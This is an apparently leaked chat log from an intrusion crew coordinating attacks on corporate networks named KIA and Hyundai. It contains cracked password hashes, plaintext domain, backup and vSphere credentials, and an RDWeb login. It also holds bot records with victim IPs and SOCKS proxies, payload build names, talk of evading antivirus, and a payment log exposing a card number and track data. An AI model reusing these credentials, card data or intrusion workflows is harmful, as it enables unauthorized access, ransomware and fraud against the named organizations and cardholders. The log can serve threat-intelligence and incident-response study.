[2023-12-23 00:05:59] @usernamess:matrix.bestflowers247.online: `1AjEomvu!aBw0H`
--------------------
[2023-12-23 00:07:27] @usernamess:matrix.bestflowers247.online: 0149b059adfce2da6ae4319fbcf100f0
--------------------
[2023-12-23 00:09:55] @usernamess:matrix.bestflowers247.online: KAESPWDSYNC::KIA:bdbf11cc8c0da67d0b66c0643903d3bdbad9736a2433b423:bdbf11cc8c0da67d0b66c0643903d3bdbad9736a2433b423:1122334455667788
--------------------
[2023-12-23 00:26:19] @cameron777:matrix.org: pecofoods.com_privat
napisali)
--------------------
[2023-12-23 00:33:24] @usernamess:matrix.bestflowers247.online: `B363047E9061E4FFC9B9CA271EFC74FE`
--------------------
[2023-12-23 00:46:48] @usernamess:matrix.bestflowers247.online: ```
kaea0013 fa2765bcf79ca2593ff85dd88611fdb6
KEUSBKUP 523e3cfa91ea07b7a5269969bbaaa829
KEUSURL 8e838331e10e6b9775838b9e8716708c
```
--------------------
[2023-12-23 03:43:38] @usernamess:matrix.bestflowers247.online: Проверить Выкачку и биконы в 39 КОБЕ
--------------------
[2023-12-23 03:43:58] @usernamenn:matrix.bestflowers247.online: **HYUNDAI**
--------------------
[2023-12-23 05:13:05] @username777:matrix.bestflowers247.online: b363047e9061e4ffc9b9ca271efc74fe:Winter2013
0149b059adfce2da6ae4319fbcf100f0:Start123

--------------------
[2023-12-23 07:48:14] @usernamegg:matrix.bestflowers247.online: доброе
--------------------
[2023-12-23 07:48:18] @usernamegg:matrix.bestflowers247.online: хендай стучит ?
--------------------
[2023-12-23 07:49:49] @usernamegg:matrix.bestflowers247.online: https://bhg.dedicatedit.net/RDWeb/Pages/en-US/login.aspx :bhg\scanner:Welcome1
--------------------
[2023-12-23 07:49:51] @usernamegg:matrix.bestflowers247.online: а что по ней
--------------------
[2023-12-23 07:49:57] @usernamegg:matrix.bestflowers247.online: доброе
--------------------
[2023-12-23 07:53:31] @usernamegg:matrix.bestflowers247.online: мы еще работаем ,  я только во второй половине дня смогу к вам приехать
--------------------
[2023-12-23 07:56:28] @usernameff:matrix.bestflowers247.online: доброе, хорошо
--------------------
[2023-12-23 07:56:39] @usernamehh:matrix.bestflowers247.online: доброе
--------------------
[2023-12-23 07:56:51] @usernamexx:matrix.bestflowers247.online: доброе
--------------------
[2023-12-23 07:58:03] @usernamexx:matrix.bestflowers247.online: я у JJ забрал модем
--------------------
[2023-12-23 07:58:12] @usernamexx:matrix.bestflowers247.online: у меня дабл сдох
--------------------
[2023-12-23 08:29:27] @usernamenn:matrix.bestflowers247.online: ```
1208 162505841 00001 00005585 05628|4|------------------------------------                                                        .
1208 162505841 00001 00005585 05628|4|- FLD (FIELD): LENGTH :  DATA                                                               .
1208 162505841 00001 00005585 05628|4|------------------------------------                                                        .
1208 162505841 00001 00005585 05628|4|- FLD (002) : (016) : [4581867000069840]                                                    .
1208 162505841 00001 00005585 05628|4|- FLD (003) : (006) : [003000]                                                              .
1208 162505841 00001 00005585 05628|4|- FLD (004) : (012) : [000000006305]                                                        .
1208 162505841 00001 00005585 05628|4|- FLD (005) : (012) : [000000003125]                                                        .
1208 162505841 00001 00005585 05628|4|- FLD (006) : (012) : [000000006305]                                                        .
1208 162505841 00001 00005585 05628|4|- FLD (007) : (010) : [0812142318]                                                          .
1208 162505841 00001 00005585 05628|4|- FLD (009) : (008) : [40020175]                                                            .
1208 162505841 00001 00005585 05628|4|- FLD (010) : (008) : [00000001]                                                            .
1208 162505841 00001 00005585 05628|4|- FLD (011) : (006) : [263766]                                                              .
1208 162505841 00001 00005585 05628|4|- FLD (012) : (012) : [110812142318]                                                        .
1208 162505841 00001 00005585 05628|4|- FLD (014) : (004) : [1407]                                                                .
1208 162505841 00001 00005585 05628|4|- FLD (015) : (004) : [0419]                                                                .
1208 162505841 00001 00005585 05628|4|- FLD (016) : (004) : [0812]                                                                .
1208 162505841 00001 00005585 05628|4|- FLD (018) : (004) : [5309]                                                                .
1208 162505841 00001 00005585 05628|4|- FLD (019) : (003) : [084]                                                                 .
1208 162505841 00001 00005585 05628|4|- FLD (021) : (003) : [084]                                                                 .
1208 162505841 00001 00005585 05628|4|- FLD (022) : (012) : [200101209144]                                                        .
1208 162505841 00001 00005585 05628|4|- FLD (024) : (003) : [100]                                                                 .
1208 162505841 00001 00005585 05628|4|- FLD (032) : (006) : [406667]                                                              .
1208 162505841 00001 00005585 05628|4|- FLD (033) : (006) : [000007]                                                              .
1208 162505841 00001 00005585 05628|4|- FLD (035) : (037) : [4581867000069840=14075011154811900001]                               .
1208 162505841 00001 00005585 05628|4|- FLD (037) : (012) : [110800002565]                                                        .
1208 162505841 00001 00005585 05628|4|- FLD (040) : (003) : [501]                                                                 .
1208 162505841 00001 00005585 05628|4|- FLD (041) : (008) : [2409010C]                                                            .
1208 162505841 00001 00005585 05628|4|- FLD (042) : (015) : [084110611107226]                                                     .
1208 162505841 00001 00005585 05628|4|- FLD (043) : (040) : [JAMES BRODIE & CO LIMITE>BELIZE C.A.  BZ]                            .
1208 162505841 00001 00005585 05628|4|- FLD (048) : (068) :                                                                       .
1208 162505841 00001 00005585 05628|4|       >Tag: 'P02' : (MESSAGE_TEXT............ ) : [IR]                                     .
1208 162505841 00001 00005585 05628|4|       >Tag: 'P13' : (EXTERNAL_STAN........... ) : [002565]                                 .
1208 162505841 00001 00005585 05628|4|       >Tag: 'P17' : (RRN_RETREVIAL_TAG....... ) : [110812110800002565]                     .
1208 162505841 00001 00005585 05628|4|       >Tag: 'P55' : (POSH_BATCH_NUM.........  ) : [000001]                                 .
1208 162505841 00001 00005585 05628|4|       >Tag: 'P94' : (SECONDARY_RESOURCE       ) : [110000]                                 .
1208 162505841 00001 00005585 05628|4|- FLD (049) : (003) : [084]                                                                 .
1208 162505841 00001 00005585 05628|4|- FLD (050) : (003) : [840]                                                                 .
1208 162505841 00001 00005585 05628|4|- FLD (051) : (003) : [084]                                                                 .
1208 162505841 00001 00005585 05628|4|- FLD (053) : (062) :                                                                       .
1208 162505841 00001 00005585 05628|4|       > SECURITY FORMAT          ..............: [00]                                      .
1208 162505841 00001 00005585 05628|4|       > PIN BLOCK FORMAT         ..............: [00]                                      .
1208 162505841 00001 00005585 05628|4|       > PIN ENCRYPTION KEY INDEX ..............: [000]                                     .
1208 162505841 00001 00005585 05628|4|       > MAC KEY INDEX            ..............: [000]                                     .
1208 162505841 00001 00005585 05628|4|       > SOURCE PID               ..............: [00005519]                                .
1208 162505842 00001 00005585 05628|4|       > SOURCE RESOURCE          ..............: [200001]                                  .
1208 162505842 00001 00005585 05628|4|       > DESTINATION PID          ..............: [00005585]                                .
1208 162505842 00001 00005585 05628|4|       > DESTINATION RESOURCE     ..............: [110000]                                  .
1208 162505842 00001 00005585 05628|4|       > USER                     ..............: [POSH ISO  05564]                         .
1208 162505842 00001 00005585 05628|4|       > PURGE TIME               ..............: [313180725]                               .
1208 162505842 00001 00005585 05628|4|- FLD (071) : (008) : [  000001]                                                            .
1208 162505842 00001 00005585 05628|4|------------------------------------                                                        .
1208 162505842 00001 00005585 05628|5|End   DumpIso()                                                                             .
1208 162505842 00001 00005585 05628|4|Start ReadBalMsg(65538)                                                                     .
1208 162505842 00001 00005585 05628|4|msgrcv                                                                                      .
1208 162505842 00001 00005585 05639|4|Start ResourceStatusSignOn(ONL)                                                             .
1208 162505842 00001 00005585 05639|4|End   ResourceStatusSignOn(OK)                                                              .
1208 162505842 00001 00005585 05639|5|Start  FCT_AUT_REQ_TO_NW()                                                                  .
1208 162505842 00001 00005585 05639|5|Start DumpIso()                                                                             .
1208 162505842 00001 00005585 05639|4|- BIT MAP  :  FF FF 6D 01 FF FF FF 00 02 00 00 00 00 00 00 00                               .
1208 162505842 00001 00005585 05639|4|------------------------------------                                                        .
1208 162505842 00001 00005585 05639|4|- M.T.I      : 1100                                                                         .
1208 162505842 00001 00005585 05639|4|------------------------------------                                                        .
1208 162505842 00001 00005585 05639|4|- FLD (FIELD): LENGTH :  DATA                                                               .
1208 162505842 00001 00005585 05639|4|------------------------------------                                                        .
1208 162505842 00001 00005585 05639|4|- FLD (002) : (016) : [4581867000069840]                                                    .
1208 162505842 00001 00005585 05639|4|- FLD (003) : (006) : [003000]                                                              .
1208 162505842 00001 00005585 05639|4|- FLD (004) : (012) : [000000006305]                                                        .
1208 162505842 00001 00005585 05639|4|- FLD (005) : (012) : [000000003125]                                                        .
1208 162505842 00001 00005585 05639|4|- FLD (006) : (012) : [000000006305]                                                        .
1208 162505842 00001 00005585 05639|4|- FLD (007) : (010) : [0812142318]                                                          .
1208 162505842 00001 00005585 05639|4|- FLD (009) : (008) : [40020175]                                                            .
1208 162505842 00001 00005585 05639|4|- FLD (010) : (008) : [00000001]                                                            .
1208 162505842 00001 00005585 05639|4|- FLD (011) : (006) : [263766]                                                              .
1208 162505842 00001 00005585 05639|4|- FLD (012) : (012) : [110812142318]                                                        .
1208 162505842 00001 00005585 05639|4|- FLD (014) : (004) : [1407]                                                                .
1208 162505842 00001 00005585 05639|4|- FLD (015) : (004) : [0419]                                                                .
1208 162505842 00001 00005585 05639|4|- FLD (016) : (004) : [0812]                                                                .
1208 162505842 00001 00005585 05639|4|- FLD (018) : (004) : [5309]                                                                .
1208 162505842 00001 00005585 05639|4|- FLD (019) : (003) : [084]                                                                 .
1208 162505842 00001 00005585 05639|4|- FLD (021) : (003) : [084]                                                                 .
1208 162505842 00001 00005585 05639|4|- FLD (022) : (012) : [200101209144]                                                        .
1208 162505842 00001 00005585 05639|4|- FLD (024) : (003) : [100]                                                                 .
1208 162505842 00001 00005585 05639|4|- FLD (032) : (006) : [406667]                                                              .
1208 162505842 00001 00005585 05639|4|- FLD (033) : (006) : [000007]                                                              .
1208 162505842 00001 00005585 05639|4|- FLD (035) : (037) : [4581867000069840=14075011154811900001]                               .
1208 162505842 00001 00005585 05639|4|- FLD (037) : (012) : [110800002565]                                                        .
1208 162505842 00001 00005585 05639|4|- FLD (040) : (003) : [501]                                                                 .
1208 162505842 00001 00005585 05639|4|- FLD (041) : (008) : [2409010C]                                                            .
1208 162505842 00001 00005585 05639|4|- FLD (042) : (015) : [084110611107226]                                                     .
1208 162505842 00001 00005585 05639|4|- FLD (043) : (040) : [JAMES BRODIE & CO LIMITE>BELIZE C.A.  BZ]                            .
1208 162505842 00001 00005585 05639|4|- FLD (048) : (068) :                                                                       .
1208 162505842 00001 00005585 05639|4|       >Tag: 'P02' : (MESSAGE_TEXT............ ) : [IR]                                     .
1208 162505842 00001 00005585 05639|4|       >Tag: 'P13' : (EXTERNAL_STAN........... ) : [002565]                                 .
1208 162505843 00001 00005585 05639|4|       >Tag: 'P17' : (RRN_RETREVIAL_TAG....... ) : [110812110800002565]                     .
1208 162505843 00001 00005585 05639|4|       >Tag: 'P55' : (POSH_BATCH_NUM.........  ) : [000001]                                 .
1208 162505843 00001 00005585 05639|4|       >Tag: 'P94' : (SECONDARY_RESOURCE       ) : [110000]                                 .
1208 162505843 00001 00005585 05639|4|- FLD (049) : (003) : [084]                                                                 .
1208 162505843 00001 00005585 05639|4|- FLD (050) : (003) : [840]                                                                 .
1208 162505843 00001 00005585 05639|4|- FLD (051) : (003) : [084]                                                                 .
1208 162505843 00001 00005585 05639|4|- FLD (053) : (062) :                                                                       .
1208 162505843 00001 00005585 05639|4|       > SECURITY FORMAT          ..............: [00]                                      .
1208 162505843 00001 00005585 05639|4|       > PIN BLOCK FORMAT         ..............: [00]                                      .
1208 162505843 00001 00005585 05639|4|       > PIN ENCRYPTION KEY INDEX ..............: [000]                                     .
1208 162505843 00001 00005585 05639|4|       > MAC KEY INDEX            ..............: [000]                                     .
1208 162505843 00001 00005585 05639|4|       > SOURCE PID               ..............: [00005519]                                .
1208 162505843 00001 00005585 05639|4|       > SOURCE RESOURCE          ..............: [200001]                                  .
1208 162505843 00001 00005585 05639|4|       > DESTINATION PID          ..............: [00005585]                                .
1208 162505843 00001 00005585 05639|4|       > DESTINATION RESOURCE     ..............: [110000]                                  .
1208 162505843 00001 00005585 05639|4|       > USER                     ..............: [POSH ISO  05564]                         .
1208 162505843 00001 00005585 05639|4|       > PURGE TIME               ..............: [313180725]                               .
1208 162505843 00001 00005585 05639|4|- FLD (071) : (008) : [  000001]                                                            .
1208 162505843 00001 00005585 05639|4|------------------------------------                                                        .
1208 162505843 00001 00005585 05639|5|End   DumpIso()                                                                             .
1208 162505843 00001 00005585 05639|5|VISA purge time 0.000000                                                                    .
1208 162505843 00001 00005585 05639|5|==> InsertKey = [11002637664581867000069840]                                                .
1208 162505843 00001 00005585 05639|5|Start  BuildAutReqToNw()                                                                    .
1208 162505843 00001 00005585 05639|5|Start IsoToVisaProcessingCode()                                                             .
```

--------------------
[2023-12-23 08:29:43] @usernamegg:matrix.bestflowers247.online: > <@usernamexx:matrix.bestflowers247.online> я у JJ забрал модем

забрал?
--------------------
[2023-12-23 08:33:25] @cameron777:matrix.org: privet
--------------------
[2023-12-23 08:33:27] @cameron777:matrix.org: da
--------------------
[2023-12-23 08:33:34] @cameron777:matrix.org: KIA.EUCORP.LOCAL
hyundai.EUCORP.LOCAL

--------------------
[2023-12-23 08:36:35] @usernamexx:matrix.bestflowers247.online: да забрал
--------------------
[2023-12-23 08:36:48] @usernamexx:matrix.bestflowers247.online: чтоб выйти в сеть
--------------------
[2023-12-23 08:37:11] @usernamegg:matrix.bestflowers247.online: а он что без связи ?
--------------------
[2023-12-23 08:37:17] @usernamegg:matrix.bestflowers247.online: забери у VV
--------------------
[2023-12-23 08:37:49] @usernamegg:matrix.bestflowers247.online: whafh.com
--------------------
[2023-12-23 08:37:53] @usernamegg:matrix.bestflowers247.online: лого переделай у них
--------------------
[2023-12-23 08:38:00] @usernamexx:matrix.bestflowers247.online: уже сделал
--------------------
[2023-12-23 08:38:04] @usernamegg:matrix.bestflowers247.online: CC говорит писал тебе уже
--------------------
[2023-12-23 08:38:17] @usernamegg:matrix.bestflowers247.online: Снимок экрана 2023-12-23 в 11.38.10.png
--------------------
[2023-12-23 08:38:22] @usernamegg:matrix.bestflowers247.online: отлично
--------------------
[2023-12-23 08:38:41] @usernamegg:matrix.bestflowers247.online: до этого уебищно смотрелось
--------------------
[2023-12-23 08:38:45] @usernamegg:matrix.bestflowers247.online: сейчас прям збс
--------------------
[2023-12-23 08:48:29] @usernamegg:matrix.bestflowers247.online: отлично
--------------------
[2023-12-23 08:48:37] @usernamegg:matrix.bestflowers247.online: у нам по кобальтам выпил был
--------------------
[2023-12-23 08:48:43] @usernamegg:matrix.bestflowers247.online: скинь свежие соксы в группу таргетс
--------------------
[2023-12-23 08:48:50] @usernamegg:matrix.bestflowers247.online: по киа и хендаю
--------------------
[2023-12-23 08:49:02] @usernamegg:matrix.bestflowers247.online: * у нас по кобальтам выпил был
--------------------
[2023-12-23 08:49:11] @usernamegg:matrix.bestflowers247.online: они там симонтек накатили
--------------------
[2023-12-23 08:49:22] @usernamegg:matrix.bestflowers247.online: сейчас подбираем достепы к виртуализации
--------------------
[2023-12-23 08:49:26] @usernamegg:matrix.bestflowers247.online: но соксы свежие нужны
--------------------
[2023-12-23 08:49:31] @usernamess:matrix.bestflowers247.online: ```
KIA!veeam1
Annyeonghaseyo13!
Optima13!
K2a2nsta22
95HeQD-Kq5g?8Iw.P8iw
Awarehouse12
Awarehouse12
Allah2018**
wwNA8Nae_pdeX!a2LHQk
IO0Ov.W44HG?P7nXrzCQ
wwNA8Nae_pdeX!a2LHQk
Fasan2015!
```
--------------------
[2023-12-23 08:53:58] @cameron777:matrix.org: nu na etix socksi
--------------------
[2023-12-23 08:54:02] @cameron777:matrix.org: ostalis
--------------------
[2023-12-23 08:54:49] @cameron777:matrix.org: Bot ID	SKBLD002_SYSTEM_5DC360AF
IP | Country	194.78.229.69 | BE
Domain | Hosts	KIA.EUCORP.LOCAL | 0
OS	Win Server 2016
Integrity Level	System

Socks 13.57.243.97:19193
--------------------
[2023-12-23 08:55:24] @cameron777:matrix.org: Bot ID	SHBEFP001_SYSTEM_534CE894
IP | Country	91.183.198.65 | BE
Domain | Hosts	hyundai.EUCORP.LOCAL | 0
OS	Win Server 2008 R2
Integrity Level	System

Socks 13.57.243.97:11080
--------------------
[2023-12-23 08:55:33] @cameron777:matrix.org: * ```
Bot ID	SKBLD002\_SYSTEM\_5DC360AF
IP | Country	194.78.229.69 | BE
Domain | Hosts	KIA.EUCORP.LOCAL | 0
OS	Win Server 2016
Integrity Level	System

Socks 13.57.243.97:19193
```
--------------------
[2023-12-23 08:55:39] @cameron777:matrix.org: * ```
Bot ID	SHBEFP001\_SYSTEM\_534CE894
IP | Country	91.183.198.65 | BE
Domain | Hosts	hyundai.EUCORP.LOCAL | 0
OS	Win Server 2008 R2
Integrity Level	System

Socks 13.57.243.97:11080
```
--------------------
[2023-12-23 09:07:28] @usernamegg:matrix.bestflowers247.online: как тут будешь отпиши
--------------------
[2023-12-23 09:07:31] @usernamegg:matrix.bestflowers247.online: мне надо сделать файил
--------------------
[2023-12-23 09:08:10] @usernamegg:matrix.bestflowers247.online: Снимок экрана 2023-12-23 в 12.07.52.png
--------------------
[2023-12-23 09:08:34] @usernamenn:matrix.bestflowers247.online: ```
9bef0489c66109d519f4638bea66e3d8
25b5bdb9a7ef068e2810198e3bf3f38d
47b6fd6d5f591fbd9dc784cd6c59aad9
```
--------------------
[2023-12-23 09:10:14] @usernameboy:matrix.bestflowers247.online: 47b6fd6d5f591fbd9dc784cd6c59aad9:D13$3l109

--------------------
[2023-12-23 09:11:33] @usernamegg:matrix.bestflowers247.online: payload40_SMB_x64.bin
--------------------
[2023-12-23 09:11:33] @usernamegg:matrix.bestflowers247.online: payload40_443_x64.bin
--------------------
[2023-12-23 09:11:35] @usernamegg:matrix.bestflowers247.online: payload40_80_x64.bin
--------------------
[2023-12-23 09:11:36] @usernamegg:matrix.bestflowers247.online: payload40_8080_x64.bin
--------------------
[2023-12-23 09:15:39] @usernamemm:matrix.bestflowers247.online: она не у меня, у WW вроде как
--------------------
[2023-12-23 09:17:18] @usernamenn:matrix.bestflowers247.online: ```
[+] User Name: root, Password:
[+] User Name: KIA\KATSSQL, Password: Annyeonghaseyo13!
[+] User Name: root, Password:
[+] User Name: root, Password:
[+] User Name: katsbckp, Password: KIA!veeam1
[+] User Name: root, Password:
[+] User Name: KIA\KATSVMM, Password: Optima13!
[+] User Name: root, Password:
[+] User Name: webadmin, Password: K2a2nsta22
[+] User Name: veeam, Password: 95HeQD-Kq5g?8Iw.P8iw
[+] User Name: saesa012\easyadmin, Password: Awarehouse12
[+] User Name: easyadmin, Password: Awarehouse12
[+] User Name: root, Password:
[+] User Name: KMD\kdea1344, Password:
[+] User Name: kdea1344, Password: Allah2018**
[+] User Name: root, Password:
[+] User Name: svc_veeam, Password: wwNA8Nae_pdeX!a2LHQk
[+] User Name: kia\kdea1344, Password: Allah2018**
[+] User Name: kdea1344, Password: Allah2018**
[+] User Name: root, Password:
[+] User Name: kdea1344, Password: Allah2018**
[+] User Name: autoservice\svc_veeam_haesamvc01, Password: IO0Ov.W44HG?P7nXrzCQ
[+] User Name: kia\kdes0042, Password: wwNA8Nae_pdeX!a2LHQk
[+] User Name: kia\kdes0034, Password: Fasan2015!
```

--------------------
[2023-12-23 09:29:59] @usernamess:matrix.bestflowers247.online: ```
aesa0260 e300934048941fb66148583859dec639
aesa0263 a786f8717a9d35a0eb93361dc04a30d3
aesa0331 03c663ca4aa39659fd5eef2655bfffce
aessvsphere 5d426ad15595b0202a1957c2b3633f68
```
--------------------
[2023-12-23 09:30:03] @usernamess:matrix.bestflowers247.online: ```
aesa0260 e300934048941fb66148583859dec639
aesa0263 a786f8717a9d35a0eb93361dc04a30d3
aesa0331 03c663ca4aa39659fd5eef2655bfffce
aessvsphere 5d426ad15595b0202a1957c2b3633f68
```
--------------------
[2023-12-23 09:31:21] @usernameboy:matrix.bestflowers247.online: 5d426ad15595b0202a1957c2b3633f68:Vmware1!

--------------------
[2023-12-23 09:31:44] @cob_crypt_ward:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> как тут будешь отпиши

я тут, но совсем на чуть-чуть
--------------------
[2023-12-23 09:31:55] @cob_crypt_ward:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> sent an image.

а что с тем, который я выдал?
--------------------
[2023-12-23 09:32:10] @cob_crypt_ward:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> sent a file.

можешь под https с boku сделать?
--------------------
[2023-12-23 09:32:19] @cob_crypt_ward:matrix.bestflowers247.online: > <@cob_crypt_ward:matrix.bestflowers247.online> я тут, но совсем на чуть-чуть

через час, может больше буду здесь
--------------------
[2023-12-23 09:32:32] @cob_crypt_ward:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> sent a file.

* можешь еще с boku сделать?
--------------------
[2023-12-23 09:32:41] @cob_crypt_ward:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> sent an image.

* а что с тем, который я выдал вчера?
--------------------
[2023-12-23 09:32:44] @usernamegg:matrix.bestflowers247.online: нужно сейчас
--------------------
[2023-12-23 09:32:48] @cob_crypt_ward:matrix.bestflowers247.online: хорошо
--------------------
[2023-12-23 09:32:54] @cob_crypt_ward:matrix.bestflowers247.online: с boku можешь сделать?
--------------------
[2023-12-23 09:33:01] @usernamegg:matrix.bestflowers247.online: зачем ?
--------------------
[2023-12-23 09:33:08] @cob_crypt_ward:matrix.bestflowers247.online: лучше UDRL бдуте
--------------------
[2023-12-23 09:33:12] @cob_crypt_ward:matrix.bestflowers247.online: * лучше UDRL будет
--------------------
[2023-12-23 09:33:14] @usernamegg:matrix.bestflowers247.online: ща
--------------------
[2023-12-23 09:33:31] @usernameww:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> bhg\scanner:Welcome1

заявлено
https://www.zoominfo.com/c/mst-development/38569706
на самом деле
https://www.zoominfo.com/c/bunkhouse-group/1124244146
попробовал все движения нет
--------------------
[2023-12-23 09:33:35] @usernamess:matrix.bestflowers247.online: ++
--------------------
[2023-12-23 09:34:34] @usernamegg:matrix.bestflowers247.online: boku_recoded_x64.zip
--------------------
[2023-12-23 09:34:42] @cob_crypt_ward:matrix.bestflowers247.online: он, да
--------------------
[2023-12-23 09:34:48] @cob_crypt_ward:matrix.bestflowers247.online: вместо elusive
--------------------
[2023-12-23 09:34:51] @cob_crypt_ward:matrix.bestflowers247.online: помнишь, да?
--------------------
[2023-12-23 09:39:25] @username777:matrix.bestflowers247.online: 25b5bdb9a7ef068e2810198e3bf3f38d:fORCEd73

--------------------
[2023-12-23 09:46:42] @usernamegg:matrix.bestflowers247.online: да
--------------------
[2023-12-23 09:46:51] @usernamegg:matrix.bestflowers247.online: Снимок экрана 2023-12-23 в 12.46.47.png
--------------------
[2023-12-23 09:46:57] @cob_crypt_ward:matrix.bestflowers247.online: ++

--------------------
[2023-12-23 09:47:09] @usernamegg:matrix.bestflowers247.online: вернул обратно
--------------------
[2023-12-23 09:47:16] @usernamegg:matrix.bestflowers247.online: Снимок экрана 2023-12-23 в 12.47.11.png
--------------------
[2023-12-23 09:47:19] @cob_crypt_ward:matrix.bestflowers247.online: ++
--------------------
[2023-12-23 09:47:30] @cob_crypt_ward:matrix.bestflowers247.online: ты перед тем как вернуть, билды сделал?
--------------------
[2023-12-23 09:47:45] @usernamegg:matrix.bestflowers247.online: lа
--------------------
[2023-12-23 09:47:46] @usernamegg:matrix.bestflowers247.online: да
--------------------
[2023-12-23 09:47:56] @cob_crypt_ward:matrix.bestflowers247.online: давай, жду тогда билды
--------------------
[2023-12-23 09:48:00] @usernamegg:matrix.bestflowers247.online: ну конечно
--------------------
[2023-12-23 09:48:09] @cob_crypt_ward:matrix.bestflowers247.online: ну а вдруг)
--------------------
[2023-12-23 09:48:21] @usernamegg:matrix.bestflowers247.online: payload8080_boku_x64.bin
--------------------
[2023-12-23 09:49:24] @u123:matrix.bestflowers247.online: привет
--------------------
[2023-12-23 09:49:25] @u123:matrix.bestflowers247.online: тут?
--------------------
[2023-12-23 09:51:05] @usernamess:matrix.bestflowers247.online: ```
KIA.EUCORP.LOCAL\katsbckp KIA!veeam1

KIA.EUCORP.LOCAL\KAESSPLUNK Winter2013

KIA\KNLA0005 9bef0489c66109d519f4638bea66e3d8
KIA\KNLA0002 25b5bdb9a7ef068e2810198e3bf3f38d
KIA\KBLSVCENTER D13$3l109
```
--------------------
[2023-12-23 09:52:26] @usernameboy:matrix.bestflowers247.online: > <@usernamess:matrix.bestflowers247.online> ```
> kaea0013 fa2765bcf79ca2593ff85dd88611fdb6
> KEUSBKUP 523e3cfa91ea07b7a5269969bbaaa829
> KEUSURL 8e838331e10e6b9775838b9e8716708c
> ```

523e3cfa91ea07b7a5269969bbaaa829:A1s1km1)

--------------------
[2023-12-23 09:54:53] @cob_crypt_ward:matrix.bestflowers247.online: c32.exe
--------------------
[2023-12-23 09:55:04] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2023-12-23 09:55:07] @usernamess:matrix.bestflowers247.online: ```
EUCORP\AESA0014 fa2765bcf79ca2593ff85dd88611fdb6
EUCORP\AESA0021 1c85a893feb07b1a412e46d99af917ef
EUCORP\AESA0010 cee1685a43bb503b7cbaad0ea8dfd1fa
EUCORP\AESA0263 a786f8717a9d35a0eb93361dc04a30d3
EUCORP\AESA0260 e300934048941fb66148583859dec639
EUCORP\AESA0271 e9b9f41d2772450f5d56023ce3e2dba3
EUCORP\AESA0307 0ec4244139f5923b1ab7326830fb7bd2
EUCORP\AESA0294 33b1067f725e196f208e5d15cd97e855
EUCORP\AESSNBUP1 b24bb777c99ba8024640bbccf2188b48
EUCORP\AESA0329 aad372d3ff07dbc7bcfb17e745424251
EUCORP\AESA0322 c04a3cfff818af7353db8518de308d24
EUCORP\AESA0331 03c663ca4aa39659fd5eef2655bfffce
EUCORP\AESA0330 771ae22b5c35cf97190a5db8b1e647a9
EUCORP\AESA0345 dd6730deae590ba72b240da9591c7f88
```
--------------------
[2023-12-23 09:55:09] @cob_crypt_ward:matrix.bestflowers247.online: остальные делаю?
--------------------
[2023-12-23 09:55:13] @usernamegg:matrix.bestflowers247.online: lf
--------------------
[2023-12-23 09:55:14] @usernamegg:matrix.bestflowers247.online: da
--------------------
[2023-12-23 09:55:33] @usernamegg:matrix.bestflowers247.online: если в общем накидали то делай
--------------------
[2023-12-23 09:55:41] @usernamegg:matrix.bestflowers247.online: мои тоже нужно
--------------------
[2023-12-23 09:55:46] @cob_crypt_ward:matrix.bestflowers247.online: счас тогда
--------------------
[2023-12-23 09:56:04] @cob_crypt_ward:matrix.bestflowers247.online: сбилди их тоже с бокой, пожалуйста
--------------------
[2023-12-23 09:56:07] @cob_crypt_ward:matrix.bestflowers247.online: он лучше elusive
--------------------
[2023-12-23 09:56:18] @username777:matrix.bestflowers247.online: c04a3cfff818af7353db8518de308d24:B@toul@2019

--------------------
[2023-12-23 09:56:38] @usernameboy:matrix.bestflowers247.online: b3ef932b163c1a89cd86c3d2538b3ad5:LilyJeep123$
c04a3cfff818af7353db8518de308d24:B@toul@2019
aad372d3ff07dbc7bcfb17e745424251:Saket@6192

--------------------
[2023-12-23 09:56:39] @usernamehunter:matrix.bestflowers247.online: 771ae22b5c35cf97190a5db8b1e647a9:Sob7anAllah44$$

--------------------
[2023-12-23 09:56:49] @cob_crypt_ward:matrix.bestflowers247.online: boku_recoded_x64.zip
--------------------
[2023-12-23 09:56:50] @usernameboy:matrix.bestflowers247.online: * b3ef932b163c1a89cd86c3d2538b3ad5:LilyJeep123$
aad372d3ff07dbc7bcfb17e745424251:Saket@6192

--------------------
[2023-12-23 09:57:01] @cob_crypt_ward:matrix.bestflowers247.online: кто билды делает, используйте теперь пожалуйста boku, а не elusive
--------------------
[2023-12-23 09:57:25] @usernameboy:matrix.bestflowers247.online: *
aad372d3ff07dbc7bcfb17e745424251:Saket@6192

--------------------
[2023-12-23 09:57:26] @usernamegg:matrix.bestflowers247.online: c32.exe
--------------------
[2023-12-23 09:58:41] @usernamess:matrix.bestflowers247.online: b3ef932b163c1a89cd86c3d2538b3ad5
это не наше?
--------------------
[2023-12-23 09:58:48] @usernamegg:matrix.bestflowers247.online: да
--------------------
[2023-12-23 09:59:00] @usernamehunter:matrix.bestflowers247.online: e300934048941fb66148583859dec639:Powermax!1999

--------------------
[2023-12-23 09:59:23] @usernameboy:matrix.bestflowers247.online: > <@usernamess:matrix.bestflowers247.online> b3ef932b163c1a89cd86c3d2538b3ad5
> это не наше?

Не, плохо скопировал
--------------------
[2023-12-23 09:59:49] @usernamegg:matrix.bestflowers247.online: payloadBoku_80_x64.bin
--------------------
[2023-12-23 10:01:23] @usernamehunter:matrix.bestflowers247.online: dd6730deae590ba72b240da9591c7f88:Myjeble@123

--------------------
[2023-12-23 10:01:34] @usernamegg:matrix.bestflowers247.online: Снимок экрана 2023-12-23 в 13.01.13.png
--------------------
[2023-12-23 10:01:49] @cob_crypt_ward:matrix.bestflowers247.online: x64?
--------------------
[2023-12-23 10:01:55] @cob_crypt_ward:matrix.bestflowers247.online: при запуске такое?
--------------------
[2023-12-23 10:02:22] @username777:matrix.bestflowers247.online: e9b9f41d2772450f5d56023ce3e2dba3:Praz@325

--------------------
[2023-12-23 10:02:48] @usernamegg:matrix.bestflowers247.online: https://community.broadcom.com/symantecenterprise/communities/community-home/digestviewer/viewthread?MessageKey=12d05d53-d902-4774-9391-4b4e54f7a77d&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=digestviewer#bm12d05d53-d902-4774-9391-4b4e54f7a77d
--------------------
[2023-12-23 10:03:30] @usernamegg:matrix.bestflowers247.online: JJ - позовите
--------------------
